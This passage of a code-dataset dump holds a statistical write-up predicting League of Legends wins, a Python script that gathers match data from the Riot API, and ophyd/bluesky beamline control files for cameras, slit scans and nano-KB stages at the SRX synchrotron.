the analysis. As a match in League of Legends nears its end, the team that ultimately wins typically gains momentum and begins to accumulate more kills, assists, and inhibitor kills than the team that loses. It seems highly likely that these variables can predict the winner, but that is because these are specifically the actions that cause a team to win in the first place. The goal of this analysis is to find player behaviors that less obviously could push a team to victory, as well as look at behavior that focuses more specifically on the early game through the API's time designations (\"010\", \"1020\", and \"2030\" variables.)\n\nOriginally this list of variables were chosen to provide a varied data set, but when setting out to begin a logical analysis, several variables were eliminated immediately. The Jungler role - designated \"None\" under Role - plays so differently from other positions that it was deemed to need a separate model. All three Creeps variables barely apply, and Jungler is the only role to which NeutralMinion variables apply in any meaningful way. With all this in mind, the NeutralMinion variables were omitted, and all observations from games in which Player T played the Jungler role were also omitted, leaving 436 observations. In addition, in League of Legends a team can forfeit once the game has lasted twenty minutes, which happens fairly frequently. This means all variables ending in 2030 had very many missing values. Deciding the timed variables can just focus on the early portions of the game, all 2030 variables were omitted from analysis. Six of the 436 games also ended before twenty minutes had passed and thus were also missing the 1020 variables, so these six games were omitted from analysis because our sample size was still plenty large, and having observations where the game ended before twenty minutes won't give us much information about typical player behavior.\n\nChampion, MatchID, Role, and Lane were all collected as a means of sorting data and were not actually included in the model. Role and Lane could certainly have been included to explore interaction effects, and there would be value in doing so in a future analysis. For a preliminary exploratory analysis, they were omitted for simplicity's sake.\n\nAnalysis\n--------\n\nLogistic regression will be the model used for this analysis. When the response variable consists of two values, success and failure (corresponding to wins and losses in this situation), this is called a binomial response. A typical linear regression model is not appropriate for a binomial response because in a linear model if extremely high or low values of the predictor are chosen your response could theoretically be from negative to positive infinity. A useful model here would output 1 for a game Player T is like to win and 0 for a game Player T is likely to lose. A logistic regression accomplishes this - it's output will not literally be interpretible because it is called \"log-odds\" but it can easily and consistently be transformed into a decimal between 0 and 1 representing a probability that Player T will win the game according to the model.\n\nThe model will begin with all of the remaining variables after the discussion in the Data Summary section, and these variables will be eliminated manually using a standard of alpha = .05 to designate variables as insignificant - that is, if a variable has a p-value less than .05 it will be considered significant. In most cases at each step of the modeling process the variable with the highest p-value was removed, but in a few cases a variable with a slightly lower p-value was removed instead in favor of keeping a variable that seemed more intuitive to be a predictor. However, ultimately those variables were still removed so this procedure had little impact on the final result.\n\nFollowing this procedure, the first attempt at a model was as follows:\n\n ## \n ## Call:\n ## glm(formula = cbind(Winner., Lost) ~ DamageTaken1020 + Gold1020, \n ## family = binomial, data = biztraindata)\n ## \n ## Deviance Residuals: \n ## Min 1Q Median 3Q Max \n ## -2.1941 -1.0034 0.5252 0.9237 1.8273 \n ## \n ## Coefficients:\n ## Estimate Std. Error z value Pr(>|z|) \n ## (Intercept) -2.3775643 0.7360210 -3.230 0.001237 ** \n ## DamageTaken1020 -0.0021430 0.0006388 -3.355 0.000794 ***\n ## Gold1020 0.0111569 0.0018478 6.038 1.56e-09 ***\n ## ---\n ## Signif. codes: 0 '***' 0.001 '**' 0.01 '*' 0.05 '.' 0.1 ' ' 1\n ## \n ## (Dispersion parameter for binomial family taken to be 1)\n ## \n ## Null deviance: 451.59 on 329 degrees of freedom\n ## Residual deviance: 386.85 on 327 degrees of freedom\n ## AIC: 392.85\n ## \n ## Number of Fisher Scoring iterations: 4\n\nSurprisingly, almost all variables were not significant in predicting whether Player T would win or lose the game he was playing. Only two were: DamageTaken1020 and Gold1020.\n\nThis result was a bit disappointing - these two variables have similar issues as Kills and Assists would, that as a team gains momentum the damage they take will decrease and the gold they gain will increase dramatically, so there is a legitimate concern that it cannot be used to predict a win so much as it is being used to predict whether a team has already done what it needs to do to be getting close to winning.\n\nKnowing that this analysis is ultimately informal because of perhaps infinite lurking variables, I continued brainstorming and eventually realized that, much like Jungler, Support also has a highly unique playstyle and would have very different values for most of these variables than the more \"typical\" roles often called \"Top\", \"Mid\", and \"ADC.\" So modeling was attempted again, this time removing all games in which Player T played the support role, this time leaving 360 observations remaining. This time, also interested in an assessment of the accuracy of the model's predictive power, the data was split into a training and test set. 300 observations were randomly selected to train the model, and the remaining 60 observations were set aside to assess how accruately the model would predict whether the 60 games were wins or losses.\n\nThe procedure for selecting variables was the same as before, and the final model was as follows:\n\n ## \n ## Call:\n ## glm(formula = cbind(Winner., Lost) ~ DamageTaken1020 + Gold1020, \n ## family = binomial, data = biztraindata2)\n ## \n ## Deviance Residuals: \n ## Min 1Q Median 3Q Max \n ## -2.2003 -0.9837 0.4908 0.9559 1.9053 \n ## \n ## Coefficients:\n ## Estimate Std. Error z value Pr(>|z|) \n ## (Intercept) -3.0985030 0.7928645 -3.908 9.31e-05 ***\n ## DamageTaken1020 -0.0016186 0.0006565 -2.466 0.0137 * \n ## Gold1020 0.0118372 0.0019267 6.144 8.05e-10 ***\n ## ---\n ## Signif. codes: 0 '***' 0.001 '**' 0.01 '*' 0.05 '.' 0.1 ' ' 1\n ## \n ## (Dispersion parameter for binomial family taken to be 1)\n ## \n ## Null deviance: 412.47 on 299 degrees of freedom\n ## Residual deviance: 351.13 on 297 degrees of freedom\n ## AIC: 357.13\n ## \n ## Number of Fisher Scoring iterations: 4\n\nSurprisingly, the exact same variables were left significant as before, with only slight changes to the coefficients. If the data of these variables is plotted, this seems reasonably intuitive. \n\n\n\nBlue points are games that Player T won, and red points are games he lost. We can see a trend that more wins (blue points) are found as we go further down and to the right on the plot, exactly as we expect. (Remember that smaller values of Damage Taken are preferred.) There are exceptions at the extremes, and more of a mix of points around the middle of the plot, which is also expected. There are a multitude of variables not considered in the analysis, so we do not expect to be able to predict perfectly and account for all variation.\n\nTo interpret the model, note that the coefficients are the multiplied factor by which \"log-odds\" will change for a unit increase in the corresponding variable. Thus the model is:\n\nLog-odds = -3.0985 - 0.0016\\*DamageTaken1020 + .0118\\*Gold1020\n\nWe can convert log-odds to odds by simply taking *e^{estimate}* where *estimate* is the number in the Estimate column of the table. Note that odds and probability of winning are not exactly the same thing. Odds are the ratio of {Probability of Success} divided by {Probability of Failure}. \n\nThus, specifically, for each increase of one damage taken per minute from minutes ten to twenty in the game - or ten total damage taken from minutes ten to twenty - Player T's odds of winning will be multiplied by *e^{-.00162} = .998*. We can interpret this as probability with a bit more math. Probability = Odds / (1 + Odds). If we plug in the mean of Gold1020 into the formula and calculate the result at each point on the range of DamageTaken1020, we can graph how the predicted probability of winning changes as DamageTaken1020 changes. The axis for damage taken will only cover the range observed in the data to avoid drawing bad conclusions by assuming behavior not actually seen.\n\n\n\nAgain, note that this graph is only specific to when Gold1020 is at its average level. The general trend will be similar for most values, however.\n\nFor every ten gold earned from minutes ten to twenty in the game, Player T's odds of winning will be multiplied by *e^{.0118} = 1.012*. Put into perhaps a more interesting and relatable interpretation, if Player T earns an additional 1000 gold during minutes ten to twenty of the game, his odds (not probability, remember) of winning are predicted to be multiplied by *e^{1.184} = 3.267*, which is a much more notable increase, with 1000 gold still being a very attainable goal. This time, by plugging in DamageTaken1020 at its mean value we can plot how the predicted probability of winning changes as Gold1020 changes.\n\n\n\n\nAt this point it is worthwhile to note that a model suggesting a relationship between these variables is not in itself sufficient to suggest that having more gold and taking less damage directly cause Player T to be more likely to win. There are plenty of other difficult to quantify variables at play in a PvP game, and as already mentioned gold and damage taken could also just be the result (much like victory or loss themselves) of other player behaviors that also happen to cause the player to be more or less likely to win the game. Care must be taken to not assume that the results are as simple as earning more gold in a game directly causing Player T to be more likely to win. For example, maybe Player T has more gold because he killed more enemy players, which is also putting is team in a map position to take objectives and ultimately destroy the enemy base. The gold itself might not be what helps Player T win - it could be a side effect of the unknown behaviors that actually help Player T's team win.\n\nMoving forward, this exact model was used to calculate probability of Player T winning a game based on the Gold1020 and DamageTaken1020 variables from the 60 observation test data set. The responses were transformed into a probability of winning the game, and then probabilies greater than .5 were considered to be predicting victory and less than .5 were considered to be predicting a loss. Then the model's prediction and the actual result were compared. The table below shows the results:\n\n| | Model Predicts Victory | Model Predicts a Loss |\n|----------------|------------------------|-----------------------|\n| Actual Victory | 23 | 10 |\n| Actual Loss | 10 | 17 |\n\nThe first thing to note is that of the games the model predicted incorrectly, exactly half were wins and half were losses. This means the errors appear to be truly random, which is one of the assumptions of an effective model. It only predicted two-thirds of the games correctly, but with so few variables this is not so surprising - it is clear that while there is a trend of relationships between these variables it is far from perfect.\n\nTo quantify a bit more reliably, rather than simply concluding the model was accurate 66.7% of the time, the Cohen's Kappa statistic will be used. This statistic is intended to reflect the accuracy of model predictions but give a penalty to the result based on how often the model would be expected to predict correctly based on chance, specifically based on proportions in the data set in question. Cohen's Kappa less than zero means the model predicted worse than we would expect from chance, and greater than zero means better than we expect from chance, with 1 being perfect predictions. Details of the Cohen's Kappa calculaton can be found in the R Code file, and the resulting Kappa was .327. Clearly the model is predicting better than chance, but again the relationship is not perfect and the accuracy of predictions is still limited.\n\nConclusion\n----------\n\nLooking at the gold earned and damage taken of one of Player T's League of Legends matches can give a prediction of whether Player T will win or lose more often than just guessing from random chance. The model created to do so is as follows:\n\nPredicted Probability of Winning = e^{-3.0985 - 0.0016\\*DamageTaken1020 + .0118\\*Gold1020} / (1 + e^{-3.0985 - 0.0016\\*DamageTaken1020 + .0118\\*Gold1020})\n\nHowever, it does not increase the accuracy of predictions by a remarkable amount, so while a relationship between gold earned and damage taken in minutes ten to twenty of a game and the outcome of the game does exist, it is not a very strong relationship. Unfortunately we cannot also conclude that deliberately increasing gold earned or decreasing damage taken will also directly result in Player T being more likely to win, although in context this is certainly intuitive, so it is not out of the question.\n\nAlso, it must be recognized that League of Legends is primarily a team game, so there are innate limitations to looking at the behavior of only one player in the game when predicting the outcome.\n\nPerhaps most interestingly, the variables related to the first ten minutes of the game did not help predict the outcome of the game at all. While it is likely an extremely poor or successful early phase of the game would make victory more or less likely, the model does suggest that generally early game performance is not very related to the eventual outcome. Player T can take heart that a comeback is possible after the first ten minutes, and additionally should be careful to not be overzealous just because of an early lead.\n"
},
{
"alpha_fraction": 0.5411405563354492,
"alphanum_fraction": 0.5527958869934082,
"avg_line_length": 51.992645263671875,
"blob_id": "2b4d10b1bf4dbe7596de8dd8531b4d17b053e52a",
"content_id": "6122618a26ae895a3ad578c9199c18238b24dc61",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7207,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 136,
"path": "/Python-API-Data-Compiler/Code.py",
"repo_name": "GabeHinton/League-Project",
"src_encoding": "UTF-8",
"text": "import requests\nimport pandas\nimport numpy\nimport time\nfrom pandas.io.json import json_normalize\n\n# The JSON from request_summoner_number doesn't contain much information. It will be primarily used to convert the\n# summoner's name into their Riot ID number.\n\n# BE SURE to enter your API Key in the appropriate blank within __main__!\n\ndef request_summoner_number(region, summoner_name, api_key):\n url = (\"https://\"+region+\".api.pvp.net/api/lol/\"+region+\"/v1.4/summoner/by-name/\"+summoner_name+\n \"?api_key=\"+api_key)\n response = requests.get(url)\n return response.json()\n\n\n# This huge JSON array will be a full match history of the player. The only useful information we will extract\n# are the match IDs, for now of the most recent 200 games.\n\n\ndef get_match_ids(region, summoner_number, api_key):\n url = (\"https://\"+region+\".api.pvp.net/api/lol/\"+region+\"/v2.2/matchlist/by-summoner/\"+summoner_number+\n \"?api_key=\"+api_key)\n response = requests.get(url)\n return response.json()\n\n\n# An even bigger JSON containing all the information for a given match. We need to identify which number 1-10\n# the summoner we're interested in was assigned, and then pull the corresponding data we want from them.\n\n\ndef get_match_json(match_id, region, api_key):\n url = (\"https://\"+region+\".api.pvp.net/api/lol/\"+region+\"/v2.2/match/\"+match_id+\n \"?includeTimeline=true&api_key=\"+api_key)\n response = requests.get(url)\n return response.json()\n\n\ndef main():\n print \"\\nData Gathering Tool v0.1\"\n print \"Enter your region from the following list:\"\n print \"na euw eune lan br kr las oce tr ru pbe\\n\"\n\n # Be sure to put YOUR API_key in this blank before running the program.\n\n api_key = ''\n region = str(raw_input('Region (lower case):'))\n summoner_name = str(raw_input('Summoner Name IN LOWER CASE:'))\n\n # This request is to convert the summoner name to the summoner ID number.\n\n request1_json = request_summoner_number(region, summoner_name, api_key)\n print request1_json\n\n summoner_number = request1_json[summoner_name]['id']\n summoner_number = str(summoner_number)\n in_game_name = request1_json[summoner_name]['name']\n\n # This request is for the full match history.\n\n request2_json = get_match_ids(region, summoner_number, api_key)\n print request2_json\n\n match_id_list = json_normalize(request2_json['matches'])\n match_id_list = match_id_list['matchId']\n\n print match_id_list\n\n full_data = pandas.DataFrame()\n\n for n in xrange(0, 490):\n\n match_json = get_match_json(match_id=str(match_id_list[n]), region=region, api_key=api_key)\n print match_json\n\n # This is the draft for pulling the data I want out of the match JSON.\n\n for i in xrange(0, 9):\n if match_json['participantIdentities'][i]['player']['summonerName'] == in_game_name:\n match_participant_id = i+1\n\n new_data = pandas.DataFrame({'MatchID': match_id_list[n],\n 'Winner?': [match_json['participants'][match_participant_id-1]['stats']['winner']],\n 'Role': [match_json['participants'][match_participant_id-1]['timeline']['role']],\n 'Lane': [match_json['participants'][match_participant_id-1]['timeline']['lane']],\n 'Champion': [match_json['participants'][match_participant_id-1]['championId']],\n 'Gold010': match_json['participants'][match_participant_id-1]\n ['timeline']['goldPerMinDeltas'].get('zeroToTen', numpy.nan),\n 'Gold1020': match_json['participants'][match_participant_id-1]\n ['timeline']['goldPerMinDeltas'].get('tenToTwenty', numpy.nan),\n 'Gold2030': match_json['participants'][match_participant_id-1]\n ['timeline']['goldPerMinDeltas'].get('twentyToThirty', numpy.nan),\n 'Creeps010': match_json['participants'][match_participant_id-1]\n ['timeline']['creepsPerMinDeltas'].get('zeroToTen', numpy.nan),\n 'Creeps1020': match_json['participants'][match_participant_id-1]\n ['timeline']['creepsPerMinDeltas'].get('tenToTwenty', numpy.nan),\n 'Creeps2030': match_json['participants'][match_participant_id-1]\n ['timeline']['creepsPerMinDeltas'].get('twentyToThirty', numpy.nan),\n 'DamageTaken010': match_json['participants'][match_participant_id-1]\n ['timeline']['damageTakenPerMinDeltas'].get('zeroToTen', numpy.nan),\n 'DamageTaken1020': match_json['participants'][match_participant_id-1]\n ['timeline']['damageTakenPerMinDeltas'].get('tenToTwenty', numpy.nan),\n 'DamageTaken2030': match_json['participants'][match_participant_id-1]\n ['timeline']['damageTakenPerMinDeltas'].get('twentyToThirty', numpy.nan),\n 'SightWardsBought': [match_json['participants'][match_participant_id-1]['stats']\n ['sightWardsBoughtInGame']],\n 'VisionWardsBought': [match_json['participants'][match_participant_id-1]['stats']\n ['visionWardsBoughtInGame']],\n 'WardsPlaced': [match_json['participants'][match_participant_id-1]['stats']\n ['wardsPlaced']],\n 'WardsKilled': [match_json['participants'][match_participant_id-1]['stats']\n ['wardsKilled']],\n 'TotalTimeCCDealt': [match_json['participants'][match_participant_id-1]['stats']\n ['totalTimeCrowdControlDealt']],\n 'NeutralMinionsKilled': [match_json['participants'][match_participant_id-1]['stats']\n ['neutralMinionsKilled']],\n 'NeutralMinsTeamJungle': [match_json['participants'][match_participant_id-1]['stats']\n ['neutralMinionsKilledTeamJungle']],\n 'NeutralMinsEnemyJungle': [match_json['participants'][match_participant_id-1]['stats']\n ['neutralMinionsKilledEnemyJungle']]})\n\n set_data = [full_data, new_data]\n\n full_data = pandas.concat(set_data)\n\n print full_data\n\n time.sleep(1.5) # So you won't go over your api_key rate limit\n\n\n full_data.to_csv('%s_history.csv' % summoner_name)\n\nif __name__ == \"__main__\":\n main()\n"
}
] | 9 |
mrakitin/profile_collection-srx
|
https://github.com/mrakitin/profile_collection-srx
|
cf0e60738f9c4bbfc386c4e92fa114d02a4a022c
|
639f0a73e8d8db3e07b7278545714c65e3d043c4
|
5b46f06d73130221797e4bbf55caf657f80629c6
|
refs/heads/master
| 2021-07-02T10:39:34.785683 | 2020-08-31T22:38:11 | 2020-08-31T22:38:11 | 209,174,734 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5816078186035156,
"alphanum_fraction": 0.6099269390106201,
"avg_line_length": 35.488887786865234,
"blob_id": "b083675607ecb1b616109c2f11353af44abc8d5f",
"content_id": "011a632321fe8fb6ef56b12f28bdf10050162203",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3284,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 90,
"path": "/startup/21-cameras.py",
"repo_name": "mrakitin/profile_collection-srx",
"src_encoding": "UTF-8",
"text": "print(f'Loading {__file__}...')\n\n\nimport sys\nfrom ophyd.areadetector import (AreaDetector, ImagePlugin,\n TIFFPlugin, StatsPlugin,\n ROIPlugin, TransformPlugin,\n OverlayPlugin, ProcessPlugin)\nfrom ophyd.areadetector.filestore_mixins import (FileStoreIterativeWrite,\n FileStoreTIFF)\nfrom ophyd.areadetector.trigger_mixins import SingleTrigger\nfrom ophyd.areadetector.cam import AreaDetectorCam\nfrom ophyd.device import Component as Cpt\n\n\n# BPM Camera\nclass SRXTIFFPlugin(TIFFPlugin,\n FileStoreTIFF,\n FileStoreIterativeWrite):\n file_number_sync = None\n\n\nclass BPMCam(SingleTrigger, AreaDetector):\n cam = Cpt(AreaDetectorCam, 'cam1:')\n image_plugin = Cpt(ImagePlugin, 'image1:')\n\n # tiff = C(SRXTIFFPlugin, 'TIFF1:',\n # #write_path_template='/epicsdata/bpm1-cam1/2016/2/24/')\n # #write_path_template='/epicsdata/bpm1-cam1/%Y/%m/%d/',\n # #root='/epicsdata', reg=db.reg)\n # write_path_template='/nsls2/xf05id1/data/bpm1-cam1/%Y/%m/%d/',\n # root='/nsls2/xf05id1')\n roi1 = Cpt(ROIPlugin, 'ROI1:')\n roi2 = Cpt(ROIPlugin, 'ROI2:')\n roi3 = Cpt(ROIPlugin, 'ROI3:')\n roi4 = Cpt(ROIPlugin, 'ROI4:')\n stats1 = Cpt(StatsPlugin, 'Stats1:')\n stats2 = Cpt(StatsPlugin, 'Stats2:')\n stats3 = Cpt(StatsPlugin, 'Stats3:')\n stats4 = Cpt(StatsPlugin, 'Stats4:')\n # this is flakey?\n # stats5 = C(StatsPlugin, 'Stats5:')\n\n\nbpmAD = BPMCam('XF:05IDA-BI:1{BPM:1-Cam:1}', name='bpmAD', read_attrs=[])\nbpmAD.read_attrs = ['stats1', 'stats2', 'stats3', 'stats4']\nbpmAD.stats1.read_attrs = ['total']\nbpmAD.stats2.read_attrs = ['total']\nbpmAD.stats3.read_attrs = ['total']\nbpmAD.stats4.read_attrs = ['total']\n\n\n# HF VLM\n# Does this belong here or in microES?\nclass SRXHFVLMCam(SingleTrigger, AreaDetector):\n cam = Cpt(AreaDetectorCam, 'cam1:')\n image_plugin = Cpt(ImagePlugin, 'image1:')\n proc1 = Cpt(ProcessPlugin, 'Proc1:')\n stats1 = Cpt(StatsPlugin, 'Stats1:')\n stats2 = Cpt(StatsPlugin, 'Stats2:')\n stats3 = Cpt(StatsPlugin, 'Stats3:')\n stats4 = Cpt(StatsPlugin, 'Stats4:')\n roi1 = Cpt(ROIPlugin, 'ROI1:')\n roi2 = Cpt(ROIPlugin, 'ROI2:')\n roi3 = Cpt(ROIPlugin, 'ROI3:')\n roi4 = Cpt(ROIPlugin, 'ROI4:')\n over1 = Cpt(OverlayPlugin, 'Over1:')\n trans1 = Cpt(TransformPlugin, 'Trans1:')\n tiff = Cpt(SRXTIFFPlugin, 'TIFF1:',\n write_path_template='/epicsdata/hfvlm/%Y/%m/%d/',\n root='/epicsdata')\n\n\ntry:\n hfvlmAD = SRXHFVLMCam('XF:05IDD-BI:1{Mscp:1-Cam:1}',\n name='hfvlm',\n read_attrs=['tiff'])\n hfvlmAD.read_attrs = ['tiff', 'stats1', 'stats2', 'stats3', 'stats4']\n hfvlmAD.tiff.read_attrs = []\n hfvlmAD.stats1.read_attrs = ['total']\n hfvlmAD.stats2.read_attrs = ['total']\n hfvlmAD.stats3.read_attrs = ['total']\n hfvlmAD.stats4.read_attrs = ['total']\nexcept TimeoutError:\n hfvlmAD = None\n print('\\nCannot connect to HF VLM Camera. Continuing without device.\\n')\nexcept Exception as ex:\n hfvlmAD = None\n print('\\nUnexpected error connecting to HF VLM Camera.\\n')\n print(ex, end='\\n\\n')\n"
},
{
"alpha_fraction": 0.5538293719291687,
"alphanum_fraction": 0.5595530271530151,
"avg_line_length": 25.207143783569336,
"blob_id": "4917b0515fe48a77b4e81fb71668b3c943f4ff43",
"content_id": "5d7ecd6c2064f94bba6e9b85db8cb115d78668e1",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3669,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 140,
"path": "/startup/53-slitscans.py",
"repo_name": "mrakitin/profile_collection-srx",
"src_encoding": "UTF-8",
"text": "print(f'Loading {__file__}...')\n\ndef ssa_hcen_scan(start, stop, num, shutter=True):\n # Setup metadata\n scan_md = {}\n get_stock_md(scan_md)\n\n # Setup LiveCallbacks\n liveplotfig1 = plt.figure()\n liveplotx = 'h_cen_readback'\n liveploty = im.name\n livetableitem = ['h_cen_readback', im.name, i0.name]\n livecallbacks = [LiveTable(livetableitem),\n LivePlot(liveploty, x=liveplotx, fig=liveplotfig1)]\n\n # Setup the scan\n @subs_decorator(livecallbacks)\n def myscan():\n yield from scan([slt_ssa.h_cen, sclr1],\n slt_ssa.h_cen,\n start,\n stop,\n num,\n md=scan_md)\n\n # Record old position\n old_pos = slt_ssa.h_cen.position\n\n # Run the scan\n if (shutter):\n yield from mv(shut_b, 'Open')\n\n ret = yield from myscan()\n\n if (shutter):\n yield from mv(shut_b, 'Close')\n\n # Return to old position\n yield from mv(slt_ssa.h_cen, old_pos)\n\n return ret\n\ndef JJ_scan(motor, start, stop, num, shutter=True):\n # Setup metadata\n scan_md = {}\n get_stock_md(scan_md)\n\n # Setup LiveCallbacks\n liveplotfig1 = plt.figure()\n liveplotx = motor.name\n liveploty = im.name\n livetableitem = [motor.name, im.name, i0.name]\n livecallbacks = [LiveTable(livetableitem),\n LivePlot(liveploty, x=liveplotx, fig=liveplotfig1)]\n\n # Setup the scan\n @subs_decorator(livecallbacks)\n def myscan():\n yield from scan([motor, sclr1],\n motor,\n start,\n stop,\n num,\n md=scan_md)\n\n # Record old position\n old_pos = motor.position\n\n # Run the scan\n if (shutter):\n yield from mv(shut_b, 'Open')\n\n ret = yield from myscan()\n\n if (shutter):\n yield from mv(shut_b, 'Close')\n\n # Return to old position\n yield from mv(motor, old_pos)\n\n return ret\n\ndef slit_nanoKB_scan(slit_motor, sstart, sstop, sstep,\n edge_motor, estart, estop, estep, acqtime,\n shutter=True):\n \"\"\"\n Scan the beam defining slits (JJs) across the mirror.\n Perform a knife-edge scan at each position to check focal position.\n\n Parameters\n ----------\n slit_motor : motor\n slit motor that you want to scan\n sstart :\n \"\"\"\n\n scan_md = {}\n get_stock_md(scan_md)\n\n\n # calculate number of points\n snum = np.int(np.abs(np.round((sstop - sstart)/sstep)) + 1)\n enum = np.int(np.abs(np.round((estop - estart)/estep)) + 1)\n\n # Setup detectors\n dets = [sclr1, xs2]\n\n # Set counting time\n sclr1.preset_time.put(acqtime)\n xs2.external_trig.put(False)\n xs2.settings.acquire_time.put(acqtime)\n xs2.total_points.put(enum * snum)\n\n # LiveGrid\n livecallbacks = []\n roi_name = 'roi{:02}'.format(1)\n roi_key = getattr(xs2.channel1.rois, roi_name).value.name\n livecallbacks.append(LiveTable([slit_motor.name, edge_motor.name, roi_key]))\n livecallbacks.append(LivePlot(roi_key, x=edge_motor.name))\n # xlabel='Position [um]', ylabel='Intensity [cts]'))\n\n myplan = grid_scan(dets,\n slit_motor, sstart, sstop, snum,\n edge_motor, estart, estop, enum, False,\n md=scan_md)\n myplan = subs_wrapper(myplan,\n {'all': livecallbacks})\n\n # Open shutter\n if (shutter):\n yield from mv(shut_b,'Open')\n\n # grid scan\n uid = yield from myplan\n\n # Open shutter\n if (shutter):\n yield from mv(shut_b,'Close')\n\n return uid\n"
},
{
"alpha_fraction": 0.5958778262138367,
"alphanum_fraction": 0.6260581612586975,
"avg_line_length": 36.21917724609375,
"blob_id": "f8298fdbd980c0c8140f3ce2444b455da3f38969",
"content_id": "df26baabcd374d15235460aea3aed28326228267",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2717,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 73,
"path": "/startup/16-nanoES.py",
"repo_name": "mrakitin/profile_collection-srx",
"src_encoding": "UTF-8",
"text": "print(f'Loading {__file__}...')\n\n\nfrom ophyd import (Device, EpicsMotor, EpicsSignal, EpicsSignalRO,\n PVPositionerPC)\nfrom ophyd import Component as Cpt\n\n\n# nano-KB mirrors\nclass SRXNanoKBFine(PVPositionerPC):\n setpoint = Cpt(EpicsSignal, 'SPOS') # XF:05IDD-ES:1{Mir:nKBv-Ax:PC}SPOS\n readback = Cpt(EpicsSignalRO, 'RPOS') # XF:05IDD-ES:1{Mir:nKBh-Ax:PC}RPOS\n\n\nclass SRXNanoKB(Device):\n # XF:05IDD-ES:1{nKB:vert-Ax:Y}Mtr.RBV\n v_y = Cpt(EpicsMotor, 'vert-Ax:Y}Mtr')\n # XF:05IDD-ES:1{nKB:vert-Ax:PC}RPOS\n v_pitch = Cpt(SRXNanoKBFine,\n 'XF:05IDD-ES:1{nKB:vert-Ax:PC}',\n name='nanoKB_v_pitch',\n add_prefix=()) \n # XF:05IDD-ES:1{nKB:horz-Ax:PC}Mtr.RBV\n v_pitch_um = Cpt(EpicsMotor, 'horz-Ax:PC}Mtr')\n # XF:05IDD-ES:1{nKB:horz-Ax:X}Mtr.RBV\n h_x = Cpt(EpicsMotor, 'horz-Ax:X}Mtr')\n # XF:05IDD-ES:1{nKB:horz-Ax:PC}RPOS\n h_pitch = Cpt(SRXNanoKBFine,\n 'XF:05IDD-ES:1{nKB:horz-Ax:PC}',\n name='nanoKB_h_pitch',\n add_prefix=())\n # XF:05IDD-ES:1{nKB:vert-Ax:PC}Mtr.RBV\n h_pitch_um = Cpt(EpicsMotor, 'vert-Ax:PC}Mtr')\n\n\nnanoKB = SRXNanoKB('XF:05IDD-ES:1{nKB:', name='nanoKB')\n\n\n# High flux sample stages\nclass SRXNanoStage(Device):\n x = Cpt(EpicsMotor, 'sx}Mtr') # XF:05IDD-ES:1{nKB:Smpl-Ax:sx}Mtr.RBV\n y = Cpt(EpicsMotor, 'sy}Mtr') # XF:05IDD-ES:1{nKB:Smpl-Ax:sy}Mtr.RBV\n z = Cpt(EpicsMotor, 'sz}Mtr') # XF:05IDD-ES:1{nKB:Smpl-Ax:sz}Mtr.RBV\n sx = Cpt(EpicsMotor, 'ssx}Mtr') # XF:05IDD-ES:1{nKB:Smpl-Ax:ssx}Mtr.RBV\n sy = Cpt(EpicsMotor, 'ssy}Mtr') # XF:05IDD-ES:1{nKB:Smpl-Ax:ssy}Mtr.RBV\n sz = Cpt(EpicsMotor, 'ssz}Mtr') # XF:05IDD-ES:1{nKB:Smpl-Ax:ssz}Mtr.RBV\n th = Cpt(EpicsMotor, 'th}Mtr') # XF:05IDD-ES:1{nKB:Smpl-Ax:th}Mtr.RBV\n topx = Cpt(EpicsMotor, 'xth}Mtr') # XF:05IDD-ES:1{nKB:Smpl-Ax:xth}Mtr.RBV\n topz = Cpt(EpicsMotor, 'zth}Mtr') # XF:05IDD-ES:1{nKB:Smpl-Ax:zth}Mtr.RBV\n\n\nnano_stage = SRXNanoStage('XF:05IDD-ES:1{nKB:Smpl-Ax:', name='nano_stage')\n\n\n# SDD motion\nclass SRXNanoDet(Device):\n x = Cpt(EpicsMotor, 'X}Mtr') # XF:05IDD-ES:1{nKB:Det-Ax:X}Mtr.RBV\n y = Cpt(EpicsMotor, 'Y}Mtr') # XF:05IDD-ES:1{nKB:Det-Ax:Y}Mtr.RBV\n z = Cpt(EpicsMotor, 'Z}Mtr') # XF:05IDD-ES:1{nKB:Det-Ax:Z}Mtr.RBV\n\n\nnano_det = SRXNanoDet('XF:05IDD-ES:1{nKB:Det-Ax:', name='nano_det')\n\n\n# Lakeshore temperature monitors\nclass SRXNanoTemp(Device):\n temp_nanoKB_horz = Cpt(EpicsSignalRO, '2}T:C-I')\n temp_nanoKB_vert = Cpt(EpicsSignalRO, '1}T:C-I')\n temp_nanoKB_base = Cpt(EpicsSignalRO, '4}T:C-I')\n temp_microKB_base = Cpt(EpicsSignalRO, '3}T:C-I')\n\n\ntemp_nanoKB = SRXNanoTemp('XF:05IDD-ES{LS:1-Chan:', name='temp_nanoKB')\n"
},
{
"alpha_fraction": 0.5739745497703552,
"alphanum_fraction": 0.5765205025672913,
"avg_line_length": 37.846153259277344,
"blob_id": "0ced3ddd16d544cd982b1d4a993bafecb4228dbf",
"content_id": "a48dd4210d7fc5cf14ef703be0624b7a301e512c",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3535,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 91,
"path": "/startup/01-liveplot-workaround.py",
"repo_name": "mrakitin/profile_collection-srx",
"src_encoding": "UTF-8",
